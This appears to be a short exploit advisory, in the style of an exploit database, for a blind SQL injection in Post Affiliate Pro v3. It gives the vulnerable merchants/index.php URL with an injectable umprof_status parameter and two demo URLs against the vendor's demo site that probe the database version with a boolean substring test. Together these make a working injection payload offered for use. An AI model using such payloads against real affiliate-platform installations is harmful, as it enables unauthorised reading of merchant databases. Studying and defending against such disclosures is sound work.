Post Affiliate Pro version 3 suffers from a blind SQL injection vulnerability in index.php.
a86bd739cc6e10a746c4580dbe002c93dc27a866189c8b4ecc5077aab0a3cf23
[■] Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection
>©<
> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: https://www.qualityunit.com/postaffiliatepro/
>©<
[■] ExPL0iT:
|: https://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql]
[you must be merchants]
[■] D£M0:
|: https://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°]
|: https://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)]
[■] Th4nKs::
\> Str0ke </
\> Joy Division </
\> Teo Babbeo </
\> Spud </
\> Loooo Z00ooo00oo0 </ Lol ;-)